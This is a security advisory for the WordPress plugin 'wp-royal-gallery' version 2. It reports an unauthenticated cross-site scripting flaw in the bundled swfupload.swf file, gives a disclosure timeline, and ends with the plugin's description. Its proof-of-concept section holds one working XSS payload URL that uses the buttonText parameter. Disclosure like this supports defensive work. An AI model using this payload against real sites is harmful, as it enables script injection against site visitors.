wp-plugin : wp-royal-gallery

Plugin Details
Plugin Name: wp-plugin : wp-royal-gallery
Effected Version : 2 (and most probably lower version's if any)
Vulnerability : Components with Known Vulnerabilities
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://localhost/wordpress/wp-content/plugins/wproyalgallery/js/swfupload/js/swfupload.swf?buttonText=%3Ca%20href=%22javascript:alert(1)%22%3EClick+For+XSS%20%3Cfont%20size=%2216%22%3E%3C/a%3E


Disclosure Timeline
Vendor Contacted : 2013-12-09
Plugin Status : Updated on
Public Disclosure : May 25, 2014
CVE Number :
Plugin Description :
[| Royal Gallery Plugin for WordPress a free image gallery. Use [royal] code snippet in your content to dispaly this gallery. It also supports categories and multiple iamge uploads. It is possible to use this gallery multiple instances. **Features** 1. Show unlimited number of images 2. Plays youtube videos 3. Full Screen 4. Play / pause and customize the auto slider time interval 5. Customizable transition time 6. Five types of transition effects 7. Customizable pre-loader color 8. Customizable thumb rows 9. Customizable background color for gallery 10. Customizable thumb color 11. Customizable scrollbar color 12. Enable/disable short description For a working demo, visit http://vm.xmlswf.com/wordpress-plugins/royal-gallery. Installation video: http://www.youtube.com/watch?v=yf8lbA4TtQc ]